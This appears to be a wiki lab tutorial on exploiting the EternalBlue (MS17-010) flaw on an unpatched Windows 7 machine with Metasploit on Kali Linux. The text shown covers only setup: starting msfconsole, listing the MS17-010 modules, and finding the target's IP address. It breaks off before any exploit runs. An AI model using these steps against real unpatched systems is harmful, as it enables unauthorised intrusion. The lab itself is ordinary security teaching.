EternalBlue Windows 7
Jump to navigation
Jump to search
In this lab, we will learn how to use the EternalBlue vulnerability on an unpatched Windows 7 host. This exploit was linked to the NSA but has since been patched on all windows versions. We will use Metasploit on Kali Linux to make this process a little easier.
- EternalBlue
- Linux
- Security
- Metasploit
starting up metasploit
on the Kali VM we are going to open terminal and type the following commands:
service postgresql start msfconsole
we are then going to use the search command to see what Modules are available:
search eternalblue
you should see something like this:
Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Getting the IP address of your Windows 7 Machine
you will need to open command prompt and type:
ipconfig
we are looking for an ip address that looks like this 134.115.148.xxx (xxx being the last numbers)
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::2121:c64f:633e:44de%12
IPv4 Address. . . . . . . . . . . : '''134.115.148.139'''
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::a68c:dbff:fe6e:ef01%12
134.115.148.1
